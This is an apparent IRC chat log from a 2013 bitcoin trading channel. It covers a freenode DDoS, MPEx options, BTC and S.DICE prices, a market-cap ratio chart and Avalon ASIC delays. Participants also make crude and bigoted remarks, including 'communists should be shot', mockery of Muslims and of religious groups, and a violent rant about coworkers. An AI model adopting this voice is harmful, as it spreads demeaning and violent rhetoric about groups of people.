25 03:45:46 good movie Mar 25 03:45:47 the notorious big quote was from taht movie Mar 25 03:50:16 holy crap, mpexbot took 20 gig in a second and then upstream cut them off Mar 25 03:50:30 wat? Mar 25 03:50:34 er, minute Mar 25 03:50:37 your bot? Mar 25 03:51:40 $depth dice Mar 25 03:51:42 smickles: S.DICE Bids: ['1512 @ 0.0038512', '1000 @ 0.00385001', '1000 @ 0.00380002', '250 @ 0.00380002', '5555 @ 0.0036'] Mar 25 03:51:43 smickles: Asks: ['1907 @ 0.00444436', '500 @ 0.00444437', '900 @ 0.0044444', '204 @ 0.00444442', '1000 @ 0.00449999'] Mar 25 03:51:44 Bugpowder: ^ Mar 25 03:52:12 is that your bot? Mar 25 03:52:18 i maintain it Mar 25 03:52:32 I was afk during most of the DDOS Mar 25 03:52:37 kewl Mar 25 03:52:56 u r part of the mpex ecosystem Mar 25 04:02:38 top 410 adresses control roughly 35% of all BTC Mar 25 04:05:28 theres a possibility 100 individuals own 50% of BTCs outstanding lol Mar 25 04:06:37 !last s.dice Mar 25 04:06:47 assbot? Mar 25 04:06:56 kakobrekla: assbot offline? Mar 25 04:07:34 wow so the ddos is affecting all of freenode Mar 25 04:09:11 Max Keiser owns 20000 BTC Mar 25 04:10:30 Thinker_ he has signed a message with an address that has 20000 btc? Mar 25 04:10:31 at least he said he became a "bitcoin millionaire" when USD/BTC was 50 Mar 25 04:11:00 lol, after watching his show, i would take anything he says with considerable skepticism Mar 25 04:11:02 bitcoin has one of the worst "wealth" distributions of any monetary system yet Mar 25 04:11:10 MJR_III: good point :) Mar 25 04:11:21 tiberiusiv: dude...if it is so bad, why get involved? Mar 25 04:11:36 MJR what are you talking about? Mar 25 04:11:42 at the end of the day all that matters is what you do Mar 25 04:11:45 if its good, buy Mar 25 04:11:49 if it's bad, sell Mar 25 04:11:58 hallo. i got my film interrupted ;/ Mar 25 04:11:59 really only two choices Mar 25 04:12:05 no what matters is what happens when the tiny % that influence 90% of the market change their mind. Mar 25 04:12:08 we're seeing 11gbps sustained and peaks to 25 range. Mar 25 04:12:22 yeah freenode put out alerts Mar 25 04:12:31 sooo... i guess we find out today huh. Mar 25 04:12:46 but so far it's not good enough. Mar 25 04:12:57 mircea: what film? Mar 25 04:13:24 boiler room Mar 25 04:13:42 its more of an amusement movie Mar 25 04:13:50 um Mar 25 04:13:56 what else movie could it be ?! Mar 25 04:14:38 mircea: a better one is glengary glen ross Mar 25 04:14:45 ya but that one i saw. Mar 25 04:15:07 anyway. "i'm not your friend, that's your mother's racket. i'm your father, i tell you when you fuck up" Mar 25 04:15:09 solid concept. Mar 25 04:15:14 mircea_popescu: did you see what I said happened to mpexbot? Mar 25 04:15:34 hey all. I have a question about mpex options. what is the size of each contract. 100BTC? I can't find this anywhere... Mar 25 04:15:41 1btc Mar 25 04:15:50 1? Mar 25 04:15:53 yup Mar 25 04:16:01 odd... Mar 25 04:16:21 a little Mar 25 04:16:26 smickles yes. Mar 25 04:16:46 ozonelayer 1 btc per contract. Mar 25 04:17:15 why'dya think that's odd ? Mar 25 04:17:43 $mpexlag Mar 25 04:17:45 mircea_popescu: 0.112129211426 seconds Mar 25 04:17:48 heh. Mar 25 04:18:32 mircea_popescu: ok. thanks. typically, options are usually in units of 100 of the underlying asset. just a convention i believe (though SEC in the us may make this required...i'm not sure) Mar 25 04:19:02 ozonelayer from a general pov tho, the best unit is THE unit, ie 1. Mar 25 04:19:15 if they were stacks of 100 the price'd just be higher, not like you can't stack them in 100s if you want. Mar 25 04:19:52 yea...i agree. however, the convention is well established. so, this kinda goes opposite of it. no big deal. i just buy 100 as many Mar 25 04:29:07 yeh. Mar 25 04:30:26 mircea: rofl @ taaki article Mar 25 04:30:57 meanwhile http://polimedia.us/dtng/c/src/134687421996.jpg Mar 25 04:36:41 <17SACMZE9> testing testing Mar 25 04:36:48 testing Mar 25 04:40:02 testing Mar 25 04:41:57 is anybody out there? Mar 25 04:42:01 god the trading is slow and thin now Mar 25 04:42:42 Chaang-Noi: assbot is offline Mar 25 04:43:08 or do you mean btc/fiat trading? Mar 25 04:43:43 hi Mar 25 04:43:46 i'm still here Mar 25 04:44:26 strong ass ddos tonight Mar 25 04:46:17 ;;goxlag Mar 25 04:46:18 0 seconds Mar 25 04:47:27 lol, Mar 25 04:47:37 goxlag is broken Mar 25 04:47:43 ;;ticker Mar 25 04:47:43 BTCUSD ticker | Best bid: 70.20001, Best ask: 70.25001, Bid-ask spread: 0.05000, Last trade: 70.25003, 24 hour volume: 42883.17754023, 24 hour low: 63.51000, 24 hour high: 72.49999, 24 hour vwap: 69.52634 Mar 25 04:48:25 ;;goxlag Mar 25 04:48:26 0 seconds Mar 25 04:50:28 been surprisingly boring tonight on gox Mar 25 04:52:23 $mpexlag Mar 25 04:52:25 mircea_popescu: 0.108052015305 seconds Mar 25 04:52:35 lol during ddos Mar 25 04:53:02 what is NAT.ROUTERS? Mar 25 04:53:15 i mean...network address translation routers seems obviuos Mar 25 04:53:29 MJR_III it's an old inside joke. Mar 25 04:53:39 but how does that relate to a tradeable asset? Mar 25 04:53:41 sorta runninggag. Mar 25 04:53:43 it's not. Mar 25 04:53:43 ah ok Mar 25 04:54:08 one of these days i gotta get myself a new keyboard that has a functioningspacebar Mar 25 04:54:11 fuck Mar 25 04:54:19 how did you write those spaces? Mar 25 04:54:29 it works like cunt Mar 25 04:54:31 sometimes. Mar 25 04:55:08 oh thanks smickles Mar 25 04:55:32 how'd you like boiler room? Mar 25 04:55:48 but gox is slow too and all the other exchanges Mar 25 04:55:52 like really slow Mar 25 04:56:23 MJR_III i got interrupted. Mar 25 04:56:45 jesus croquet playing christ I have an urgent need to break some fucking neck Mar 25 04:56:53 buy puppies. Mar 25 04:57:09 bunnies are better Mar 25 04:57:20 but i am on one more finance movie for the night Mar 25 04:57:26 trading places Mar 25 04:57:28 lol Mar 25 04:57:41 anyway, teh boys seem to be having things under control, so i'll prolly resume Mar 25 04:57:48 motherfucking corporate leeches existing for he express purpose of doing nothing useful ever Mar 25 04:58:48 dub: what else is new Mar 25 04:59:13 dub: what is the specific reason behind that statement? Mar 25 05:01:45 asshats reworking policy they don't understand, slapping completely unrelated 'standards' designations on documents that don't come close to touching the subject matter Mar 25 05:01:57 ah i see Mar 25 05:02:47 and nobody thinks to either fire these prolific masturbating timesinks or let me punch them in the face until they die Mar 25 05:03:04 "The home-made bomb exploded at a Polemidia branch ATM machine near the city of Limassol at around 12.30 a.m. on Monday." Mar 25 05:03:08 http://greece.greekreporter.com/2013/03/24/angry-cypriots-blow-up-bank-of-cyprus-atm/ Mar 25 05:03:12 dude i'm fucked\ Mar 25 05:03:48 dub i'd fire them. you work for the wrong boss. Mar 25 05:19:17 lol dub, im okay if you hit them till they die if that helps Mar 25 05:47:31 back in the 70s for the weekend, crazy shit Mar 25 05:57:27 ;;bc,stats Mar 25 05:57:30 Current Blocks: 227909 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 1914 blocks | Next Difficulty In About: 1 week, 3 days, 8 hours, 18 minutes, and 9 seconds | Next Difficulty Estimate: 7152581.64559 | Estimated Percent Change: 6.82149 Mar 25 06:23:11 http://www.cbc.ca/news/canada/british-columbia/story/2013/02/20/bc-pidgin-protest.html Mar 25 06:23:32 poor people protesting a restaurant in vancouver.. wtf Mar 25 06:23:39 ??? Mar 25 06:23:40 for gentrifying the land Mar 25 06:23:51 im tempted to eat at that restaurant now Mar 25 06:23:51 lol Mar 25 06:24:27 basically downtown east side.. is the worst part of vancouver where poor people naturally reside Mar 25 06:24:53 then this new restaurant came up that the locals cant afford.. so they start protesting Mar 25 06:31:22 lmao Mar 25 06:31:41 are they protesting that t hey're poor or that other people are rich ? Mar 25 06:32:30 "Protesters say the restaurant -- which offers a modern menu fusing Asian and French flavours - is gentrifying the area and the premises would be better used for housing." Mar 25 06:32:44 lmao. they paid the rent. they get to say what the premises are best used for. Mar 25 06:32:56 these people should be convicted to 50-100 hours of mandatory capitalism training. Mar 25 06:33:04 fuck sensitivity, it won't get you out of the slums. Mar 25 06:33:13 fuck gay rights and women issues and all the rest of the bs. Mar 25 06:33:30 you go about saying "x's money should be better used for your own aggenda" you get arrested and you go to capitalism training. Mar 25 06:33:31 communists should be shot... Mar 25 06:33:37 nah. Mar 25 06:33:40 and socalists while we are at it... Mar 25 06:33:53 at least in places they can vote:) Mar 25 06:33:54 idiots should be shot. communists should just be starved to death. Mar 25 06:33:55 shooting communists is a waste of resources Mar 25 06:34:15 not if they can vote Mar 25 06:34:36 thats the pressing issue here in vancouver. a freaking restaurant Mar 25 06:34:51 i looked at their menu.. its not that expensive compared to other restaurants here Mar 25 06:35:06 your poor have too much money... they should not have the energy to revolt... Mar 25 06:35:18 Chaang-Noi it's not the poor revolting. Mar 25 06:35:29 it's a bunch of uppity young kids who couldn't get into a real school Mar 25 06:35:35 and need something to tell daddy over sunday dinner Mar 25 06:35:42 as to where his college fund went. Mar 25 06:35:56 can't just say "sorry dad, i'm a failure, my double major in dumbfuckery is useless" Mar 25 06:36:03 much easier to say "society is broken1!111!" Mar 25 06:36:03 okay then the people who should be poor, like out of work kids are too rich... Mar 25 06:36:16 yeah, but kinda hard to get parents to throw out the refuse they spawned. Mar 25 06:36:21 they kinda get attached to them. Mar 25 06:36:33 "my own kid, how could he be stupid" Mar 25 06:36:34 i started work at age 12, im sure my son will as well Mar 25 06:36:39 well... sometimes it happens. Mar 25 06:36:52 i moved to a country were we can avoid silly things like labour laws Mar 25 06:37:10 certainly if i ever have kids it will not be in a white country. Mar 25 06:37:24 egypt, burma, whatever the fuck. something real. Mar 25 06:37:33 brazil. Mar 25 06:37:41 burma is where i ahve had my eye for a long time, lots of opertuinity there Mar 25 06:37:47 hmm, i guess my daughter is done for then Mar 25 06:37:58 anything as long as it's not something run by the celebrated failures. Mar 25 06:38:08 smickles whyssat ? Mar 25 06:38:19 she's an american Mar 25 06:38:29 that's gonna be a tough thing to be in a coupla decades, so Mar 25 06:38:35 i wouldn't be too worried. Mar 25 06:38:44 western samoa Mar 25 06:38:50 already looking for land Mar 25 06:38:54 africa i would personally stay away from Mar 25 06:38:56 jcpham isn't that too close ? Mar 25 06:39:04 middle of the pacific Mar 25 06:39:08 close tonz Mar 25 06:39:21 we've been there. i have friends there Mar 25 06:39:21 ya but i mean culturally close. Mar 25 06:39:26 not really Mar 25 06:39:27 isn't it practically a sort of puerto rico ? Mar 25 06:39:31 not really. not at all Mar 25 06:39:35 (i have no idea, just asking) Mar 25 06:39:36 they live in opoen air huts Mar 25 06:39:43 sleep on mats Mar 25 06:39:50 eternal campink Mar 25 06:39:55 yes Mar 25 06:40:02 catch water in ceisterns Mar 25 06:40:03 i want has go, if btc keep trucking up im going to be doing a lot more traveling Mar 25 06:40:05 no plumbing Mar 25 06:40:11 pre-paid electricity Mar 25 06:40:16 aha Mar 25 06:40:22 ahh i like prepaid everything Mar 25 06:40:29 it's off the map as far as i'm concerned Mar 25 06:40:32 wow, i really have no idea where my daughter will end up. I guess the best thing to teach here is wilderness survival skills Mar 25 06:41:05 wilderness survival skills are over rated... if we need to go there there will be way too many people Mar 25 06:41:10 eats lots of taro root and papaya Mar 25 06:41:12 just tach her how to use arms, and have lots of them Mar 25 06:41:14 it grows everywhere there Mar 25 06:41:27 taro root sucks, papaya is pretty nice Mar 25 06:41:33 taro chips own Mar 25 06:41:42 anything deep fried is good Mar 25 06:41:47 not sure why i like taro Mar 25 06:42:15 buddy is samoan, we've been there, i like it is cheap Mar 25 06:42:24 USD is like 5:1 their money Mar 25 06:42:36 I think the wilderness survival skills I was taught helped me in a number of other areas, and I've only used the survival skills directly in recreational situations Mar 25 06:43:09 the philippines Mar 25 06:43:11 i think Mar 25 06:43:22 nothin' beats catching a catfish on a self-constructed hook, line and rod Mar 25 06:43:29 130nm with 6-8J/GH. how is this compared to bfl? Mar 25 06:43:42 seasteading Mar 25 06:43:44 also i live on the lake now Mar 25 06:43:45 lol Mar 25 06:43:49 we've been fishing for 3 days Mar 25 06:43:54 and eating fish Mar 25 06:43:56 but seriuosly i think you could set up a nice little island in the phils Mar 25 06:44:01 i like to eat for free Mar 25 06:44:19 island in phils, watch out for pirates and muslumz... no joke Mar 25 06:44:35 next month, we witness jcpham mad as a hatter Mar 25 06:45:39 anyways hasta mananaa Mar 25 06:45:51 good luck trading Mar 25 06:46:00 yah, muslims in the phils are fake Mar 25 06:46:07 they are just innit for the beheading Mar 25 06:46:45 the real muslims, (the pissed off kind) mean business Mar 25 06:46:48 smickles i'm pretty mad already Mar 25 06:46:55 the ones in phils shits and giggles when they behead someone Mar 25 06:47:02 i can't see how i could get crazier Mar 25 06:47:22 and rythmically time their 'allah snackbar' chants witch each stab Mar 25 06:49:35 papaya is disgusting Mar 25 06:49:44 i'd rather eat used tampons Mar 25 06:50:00 hater Mar 25 06:50:10 dude, it's obnoxious, it smells great and tastes rotten Mar 25 06:50:23 i'll make sure to invite you to my dirt hut and feed you papaya stew mircea_popescu Mar 25 06:50:44 i'll eat your pets. Mar 25 06:50:44 it'll be great, you'll sit on an old log Mar 25 06:50:53 it'll smell like old socks Mar 25 06:51:14 we can have a hut orgy Mar 25 06:51:16 allah has a snack bar ?@ Mar 25 06:51:20 the neighbors would lose it Mar 25 06:51:46 bunch of fat samoans standing around my hut in a real life circle jerk Mar 25 06:51:46 who am i going to have an orgy with ?! Mar 25 06:51:53 you and that dude you hooked up with ?! Mar 25 06:51:57 porabably the dudes Mar 25 06:52:01 but i think also if you are in the phils you could start a remittance service Mar 25 06:52:07 $$$ Mar 25 06:52:13 myeah. i'll have my secretary check my schedule for me. Mar 25 06:52:17 k cool Mar 25 06:52:53 the dude translating mpex faq to spanish made "small mormon family" into "familia de profesionales" Mar 25 06:52:59 i was like... yeah that's legit. Mar 25 06:55:25 does Mormonism translate into spanish Mar 25 06:56:02 notrly. Mar 25 06:56:09 can you teach a spanish person their religion is wrong and theat a guy from America is the one true prophet Mar 25 06:56:18 not sure if culturally correct Mar 25 06:56:29 some dumbass who was "reading" a language he didn't speak Mar 25 06:56:36 and then forgot what he read and couldn't read it again Mar 25 06:56:44 so he had to start over when he lost his original notes Mar 25 06:57:23 we have some really fucked up religion in America Mar 25 06:57:31 i wonder how many self-identified "mormons" are aware they're on mormon 2.0, 1.0 having been around for about sixteen months Mar 25 06:57:39 Jehovah's witnesses are another classic subject Mar 25 06:57:42 back in the 1800s Mar 25 06:58:05 they don't believe in christmas or birthdays Mar 25 06:58:17 so like jehovah girls are broken Mar 25 06:58:18 jcpham running joke in this group of law sophomores was threatening them with prosecution for perjury Mar 25 06:58:23 as they didn't actually witness it. Mar 25 06:58:38 because their parents never celebrated anything with them Mar 25 06:58:54 don't they celebrate first period or some weird shit "? Mar 25 06:58:57 jehovah kids are strange Mar 25 06:59:02 watch yourself Mar 25 07:03:04 lol, one of those witnesses found me with my daughter Mar 25 07:03:36 i kept the convo full of subtle puns which indicated i was an atheist Mar 25 07:03:42 all flew over his head Mar 25 07:04:06 he wanted to tell me that i needed his god to be a good dad Mar 25 07:04:33 i said something about having the natural capability Mar 25 07:05:07 he complimented my daughter's beautiful eyes, saying that they were evidence of the spectical of god Mar 25 07:05:40 christans are not know to be the smarts bunch Mar 25 07:05:47 i asked him if he noticed that they presented an evolved trait of one half of one eye being blue Mar 25 07:06:00 or any flavourt of org religion (but jedi) Mar 25 07:06:09 a trait that basically proves evolution in itself by the way it presents in humans Mar 25 07:06:58 dude had no luck converting me to his creationist ways. but I gave him a fair chance Mar 25 07:07:30 Chaang-Noi: yeah, those fsm pirates are nutters too Mar 25 07:08:30 ;;lucky fsm pirate Mar 25 07:08:30 http://en.wikipedia.org/wiki/Flying_Spaghetti_Monster Mar 25 07:08:31 sgnb smickles Smoovious SomeoneWeird splnkr sturles swhitt Mar 25 07:08:37 hah Mar 25 07:08:37 smickles your daughter has half a b lue eye !? Mar 25 07:08:45 yeah, i forgot about them, they be the awesome Mar 25 07:08:54 i almost got registered as a minster under them Mar 25 07:08:57 mircea_popescu: yup, and all her children and their children and so on will too Mar 25 07:09:01 stop beating her! Mar 25 07:09:37 fsm is est religion evar, much better than jedi Mar 25 07:09:43 maybe the dood thought it was the mark of satan, cause that was the end of our convo Mar 25 07:10:06 heh mark of satan Mar 25 07:10:11 im pretty sure satan has black eyes Mar 25 07:10:42 http://twitpic.com/c99taj/full Mar 25 07:10:46 our busses are polite Mar 25 07:10:51 ;;asks 75 Mar 25 07:10:54 There are currently 19286.523 bitcoins offered at or under 75.0 USD, worth 1425775.04212 USD in total. | Data vintage: 0.0021 seconds Mar 25 07:11:00 20k hmm Mar 25 07:11:09 ;;ticker Mar 25 07:11:09 BTCUSD ticker | Best bid: 72.00000, Best ask: 72.31499, Bid-ask spread: 0.31499, Last trade: 72.31499, 24 hour volume: 42712.39071457, 24 hour low: 65.11200, 24 hour high: 72.50000, 24 hour vwap: 69.98001 Mar 25 07:11:10 ;;asks 99.99 Mar 25 07:11:11 There are currently 45087.562 bitcoins offered at or under 99.99 USD, worth 3779057.44622 USD in total. | Data vintage: 16.9417 seconds Mar 25 07:11:34 that dude that wants to smuggle funds to malasia would push us to 100 bucks Mar 25 07:11:42 mircea_popescu: also, because of it, she should be able to see and distinguish more colors than normal people Mar 25 07:12:03 how do i teach her about a color which i can't see myself, i ask you Mar 25 07:13:11 she'll figure it out. Mar 25 07:13:17 also, better start investing in guns Mar 25 07:13:26 you'll need em in ~16 years. Mar 25 07:14:07 the guns never kept me away from others' daughters when i was young Mar 25 07:14:22 maybe they were all just pussies tho Mar 25 07:15:59 well they prolly just couldn't shoot straight. Mar 25 07:33:26 wth is this song about, i don't understand anywhere near enough french for it Mar 25 07:34:21 TO THE INTERNET! Mar 25 07:36:14 oh my, that's a much, much more sexual song than i thought it was **** ENDING LOGGING AT Mon Mar 25 07:41:17 2013 **** BEGIN LOGGING AT Mon Mar 25 08:05:15 2013 Mar 25 08:05:20 http://trilema.com/2013/smpoe-market-cap-vs-sdice-market-cap/ Mar 25 08:05:32 if anyone is a graph reading expert, please read that to me. Mar 25 08:06:39 can read your own chart? Mar 25 08:06:43 cant* Mar 25 08:07:31 it measn s.dice is now worth 60% of what it was worth at its highest valuation Mar 25 08:07:56 so someone could theroreticaly ahve lost 40% of their welath buying at the top Mar 25 08:08:05 Chaang-Noi: yes MBP Mar 25 08:08:41 toffoo can it run linux well, thinkinga bout buying one and loading on mint 14 Mar 25 08:09:30 would probably make most sense to keep OS X and load linux into a VMware virtual machine Mar 25 08:09:30 mp if you did a chart for btc the 100% would be at 74.9 and now it would be at like 95% (72.00) Mar 25 08:10:06 my goal is to keep an encrypted os to keep a btc wallet while i travel Mar 25 08:10:31 only think i need it for is btc Mar 25 08:10:32 OSX has native full disk encryption .. no need for linux for that Mar 25 08:11:13 im going to buy it at the store, how do i encrypt it? Mar 25 08:11:17 Chaang-Noi this is a mkt cap chart tho. if i took the dollar total value of BTC and the dollar value of a small company and compare them Mar 25 08:11:19 i have not used a mac in over 20 years Mar 25 08:11:38 mp lol what? Mar 25 08:11:46 there's an option in settings .. it does it in the background while you work .. it's really easy Mar 25 08:11:47 yeah. Mar 25 08:11:58 mp what i said stands unless there was share dilution Mar 25 08:12:13 there's no price in there, it's a ratio. Mar 25 08:12:43 that is why i know the guy lost 40% if bought at a high, im not telling you a price he lost at, just a ratio... 40$ is a ratio Mar 25 08:12:51 mno. Mar 25 08:13:04 mno means? Mar 25 08:13:15 say today google mkt cap is 5bn and apple mkt cap is 4 bn. then that would be 80% for that day on the graph Mar 25 08:13:28 tomorrow goog mkt cap is 6bn and apple 4.5 bn Mar 25 08:13:30 you cant look at it like that lol Mar 25 08:13:33 that's 75% on graph Mar 25 08:13:34 etc. Mar 25 08:13:37 your chart does not show anything abouty that] Mar 25 08:13:43 ... Mar 25 08:14:05 your chart only looks at s,.dice with limited info Mar 25 08:14:19 dude you're telling me what it does based on you having glanced at it ? Mar 25 08:14:28 stop being so superficial wth. Mar 25 08:14:38 it would be silly to take that chart and then look at a google chart... you could, but the only thing you could gain in knowledge is to see if the trend down was the same or not Mar 25 08:14:47 ? Mar 25 08:15:07 i honestly belive you do not know how to read that chart... Mar 25 08:15:09 listen. it's X item valued in btc divided by Y item divided in btc Mar 25 08:15:18 the price has been divided out, it's just relative sizes. Mar 25 08:15:36 all you show in the chart however is a ratio... Mar 25 08:15:39 yes. Mar 25 08:16:42 it is easy to see (assuming no share delution, or buy backs) a guy if invested at the top has lost 40% Mar 25 08:16:53 40% whats ? Mar 25 08:17:00 wealth Mar 25 08:17:14 in whatever currancy the market cap was figured in Mar 25 08:17:21 im going to assume btc Mar 25 08:17:45 listen, if i divide a distance in meters by another distance in meters, what will the result be measured in ? Mar 25 08:18:02 that is why i gave you the ratio of 40% Mar 25 08:18:07 right. Mar 25 08:18:19 you then asked of what Mar 25 08:18:22 right. Mar 25 08:18:27 so to find that out i have to see where you started Mar 25 08:18:32 and i assume you started with btc Mar 25 08:18:40 this is basic chart read and basic maths? Mar 25 08:19:05 yeah lol. it is pretty basic, but apparently not quite understood. Mar 25 08:19:39 yeah i can see that, but really its not a hard chart, look at some other real life examples and i think you can get it to click Mar 25 08:20:03 Chaang-Noi you're the one that's not getting it is the problem. Mar 25 08:20:12 also you should not start that chart at 0 but rather the ipo price Mar 25 08:20:13 come up with an example of such a chart, i'm curious. Mar 25 08:20:36 i ahve nothing to prove to up mp, you asked for my help, i gave it. take it or not, up to you Mar 25 08:20:44 lolk. Mar 25 08:21:18 others here will tell you im correct in what i said if you have doubts. Mar 25 08:21:37 that'll be just as entertaining as the original. Mar 25 08:22:06 yes, i agree Mar 25 08:22:48 maybe someone else can explain it a bit better than i, im not a good teacher. Mar 25 08:23:06 you're a very good dunnker-krugerand tho. it compensates. Mar 25 08:26:52 "Currently waiting to transfer flights in Europe, this week should be fun." -Loaded Mar 25 08:27:04 hold on to the rockets Mar 25 08:27:12 bears gonna get slaughtered Mar 25 08:27:15 lol, i help you out and you give me insults:) you must be a very angry guy. Mar 25 08:27:40 hope loaded is not a troll Mar 25 08:28:02 mhm, it could be he's planning a dump as wella ctually Mar 25 08:28:07 he owns like 40k something btc Mar 25 08:28:16 but i dont see why he would od that Mar 25 08:28:31 i doubt he dumps Mar 25 08:39:46 Chaang-Noi dude, angry bs. the situation is this : i open up something for public discussion, you come up with a completely misunderstood notion of wtf it is. i tell you so. Mar 25 08:39:56 im not angry or elated or anything else. just slightly amused. Mar 25 08:40:58 :) Mar 25 08:41:52 think of it in terms of countries. there's two countries and we're measuring their power. Mar 25 08:42:00 the smaller one goes from 40% to 80% of the bigger one during 2012 Mar 25 08:42:08 then suddenly drops back to 20% during a few months Mar 25 08:42:16 then starts climbing up to like 60% in a few weeks. Mar 25 08:42:20 the question is why ?! Mar 25 08:42:46 what has happened that turned the slow uptrend into a sudden downtrend late december ? Mar 25 08:42:55 and then what has happened to turn it back again early feb ? Mar 25 08:43:07 yeah trends are about the only thing you can look at here, and really they both could have lost 99% of value or gained 99% of value in the real world, this kinda of chart is not really sueful for much Mar 25 08:43:18 it is only usefull if you have context Mar 25 08:43:43 well yes, if both suddenly lost 99% of value in one week that wouldn't show on the graph Mar 25 08:43:48 share dilution would be one thing we would need to know Mar 25 08:43:56 only their relative evolution is shown, all the outside noise tuned out Mar 25 08:44:00 like btc going up and down etc Mar 25 08:44:07 there was no share dillution tho. Mar 25 08:44:15 if on lost 99.5% and on lost 99% just looking at the chart we would think the one that only lost 99% is better Mar 25 08:44:24 double, actually. yes. Mar 25 08:44:46 i mean shares coming onto the market, when did he dump that extra 3% of the company? cuz that was 33.33% more shares traded Mar 25 08:45:22 well, i sold 10mn packs a number of times and erik i think sold 1mn 3x Mar 25 08:45:26 diff times. Mar 25 08:45:37 iirc in february Mar 25 08:46:06 Hey guys, what do you think about the threatened attack against the LTC? https://bitcointalk.org/index.php?topic=153460.0 Mar 25 08:46:09 when he sold he put a lot of downard pressure on the stock and thus the whole company valueation Mar 25 08:46:30 and yet trend is up Mar 25 08:46:44 cads he needs to add 3 0s to his bounty... Mar 25 08:47:00 cads uhm Mar 25 08:47:02 mp trend is up to the other stock, but mdice has lost value Mar 25 08:47:08 sdice Mar 25 08:47:11 wait. to highlight the insecurity he's going to pay someone to highlight the insecurity ? Mar 25 08:47:12 evening, mircea. Hah, Chaang-Noi. Mar 25 08:47:41 mp it is a retarded troll who fails at life... cads should ignore him, or if not make fun of him Mar 25 08:48:24 mp that chart you made, with out context can not really show a whole lot of info, unless your whole world is nothing but s.dice and the other stock Mar 25 08:49:08 Chaang-Noi: yeah, sure, ignore the dude, and everyone else calls him by his initials ;) Mar 25 08:49:12 we need context Mar 25 08:49:35 avalon just sent out a newsletter Mar 25 08:49:41 cads what? Mar 25 08:49:50 ignore the guy trying to attack ltc not mp Mar 25 08:49:55 bowjob link ? Mar 25 08:50:18 Chaang-Noi: ah Mar 25 08:50:24 Chaang-Noi the other world kinda is only those yeah. Mar 25 08:50:35 yeah, he isn't really signalling very credibly Mar 25 08:51:05 cads it wont happen this was treid 9 months ago it failed hard Mar 25 08:51:38 the recent bitcoin misadventure has clearly shown we need at least one backup Mar 25 08:51:44 honestly i hope more people make more alt chains Mar 25 08:51:55 yeah its why i hold over 100k ltc Mar 25 08:52:05 im not a btc nut, im a crypto coin nut Mar 25 08:52:25 chang, i wont exactly link you to my email accoun Mar 25 08:52:26 t Mar 25 08:52:37 Chaang-Noi: Hear hear. Mar 25 08:52:38 true cryptoi anarchists wont care for the btc brand name like the many who attack ltc... Mar 25 08:52:42 Bowjob pastebin ? Mar 25 08:52:48 mhm, sure Mar 25 08:52:49 damn you bowjob!!! :) Mar 25 08:53:17 http://pastebin.com/BBjr9B78 Mar 25 08:53:35 the original email is an eyesore, i actually put it on word.. Mar 25 08:54:09 We plan to start shipping majority of batch two orders starting on 15th of April. Mar 25 08:54:18 this used to be "shipped by 15th of april" eh Mar 25 08:54:37 well it is just a "plan" Mar 25 08:55:05 Basically what he;s saying is batch 2 will arrive at the end of may Mar 25 08:55:17 and bfl is still 4 to 6 weeks Mar 25 08:55:20 since some bullshit reason will give them another excuse Mar 25 08:55:20 so basically avalon is going full mining farm. big surprise. Mar 25 08:55:21 go asicminer Mar 25 08:55:34 if i was avalon i would too Mar 25 08:55:42 ya. currently #1 threat to bitcoin Mar 25 08:55:49 larger than mtgox, if that can even be believed Mar 25 08:55:54 larger than the weirdo devteam Mar 25 08:55:57 ltc is asic resistant Mar 25 08:56:00 they're a problem. Mar 25 08:56:34 we might see 70% if the netwrok at two places in china if bfl fails like they might Mar 25 08:56:39 so if avalon 3s dont get purchased, yifu will mine themselves Mar 25 08:57:15 no mention of a vacation Mar 25 08:57:16 lol Mar 25 08:57:18 heh. Mar 25 08:57:25 "this was the plan all along". Mar 25 08:57:38 gah, so by end of may Mar 25 08:57:50 sucks, i was hoping to get the best birthday present ever Mar 25 08:57:53 fuck that shit. Mar 25 08:58:14 if the western world we're sane this'd be pretty much the start of ww3. Mar 25 08:59:19 honestly there is no reason why they should not keep the hardware once all orders all filled, however bfl can do this for years, lol Mar 25 08:59:24 cant Mar 25 08:59:26 " organize" Mar 25 08:59:32 mean vacation Mar 25 08:59:45 chinese do not vacation like you or me... Mar 25 08:59:57 vacation means work differently, Mar 25 09:00:54 bfl syndrome Mar 25 09:00:55 fuck them Mar 25 09:01:17 why cant we have a reputable asic vendor. that does exactly what they say they would Mar 25 09:01:43 Shipping Time: May 5st, 2013 Mar 25 09:01:46 may 5st! Mar 25 09:02:25 "a brand new SMT line in our facility. This upgrade will effectively double our production capacity, it enable us to put Avalon into the hands of our customer even faster. The new line is currently scheduled to come online during the last week of April" Mar 25 09:02:48 What I don't get is.. if SMT line is scheduled to go online at the end of April.. Mar 25 09:03:01 and they say they will ship the majority in the middle of April Mar 25 09:03:25 taht means they will only ship 300 at most in the middle of april Mar 25 09:04:04 the other half at the end of april, adding extra delays and fuckups.. the "shipping date" will be May 5th, followed with 3 weeks of uncertainty Mar 25 09:04:24 and followed with the actual stuff getting into customers' hands at the end of may Mar 25 09:05:19 maybe Mar 25 09:09:12 pardon the interuption but is https://btc.penek.org/ down for everyone Mar 25 09:09:38 doesn't load for me Mar 25 09:09:47 thx MP Mar 25 09:15:17 mp may 5st? lol for what? Mar 25 09:15:42 last half of batch 2? Mar 25 09:16:02 yeah the max they can produce is batch 3 Mar 25 09:16:03 i mean Mar 25 09:16:09 300 units Mar 25 09:16:22 for half of april, factoring the fuckups, shipping 5-10 a day Mar 25 09:16:34 k, the math doesnt add up they ship a bit more than that.. Mar 25 09:16:58 yeah, chances are.. batch 2.5 will be at the hands of customers at the end of may Mar 25 09:19:19 works for me Mar 25 09:26:12 basically bitcoin is on a countdown before avalon gets too much mining together. Mar 25 09:26:41 well played, i must agree, throw a few scraps to the clueless westerners, enough to get them to front your capital. Mar 25 09:26:57 unethical, but then again chinese. Mar 25 09:26:58 they still have one big haul left Mar 25 09:27:08 time is tickingaway. Mar 25 09:27:29 so they will get about 2.6 million dollars Mar 25 09:27:46 and makea farm for themselves Mar 25 09:27:52 mp i would do what they did if i had rthe skillz Mar 25 09:28:02 if they dont get the 2.6, they will mine anyway Mar 25 09:28:14 i would stay under 50% hoowever Mar 25 09:30:03 ;;ticker Mar 25 09:30:04 BTCUSD ticker | Best bid: 72.00001, Best ask: 72.27999, Bid-ask spread: 0.27998, Last trade: 72.00001, 24 hour volume: 43429.77497546, 24 hour low: 66.10000, 24 hour high: 72.78499, 24 hour vwap: 70.24961 Mar 25 09:34:02 75btc for avalon 3 Mar 25 09:37:30 ;;asks 75 Mar 25 09:37:33 There are currently 18991.757 bitcoins offered at or under 75.0 USD, worth 1404049.42126 USD in 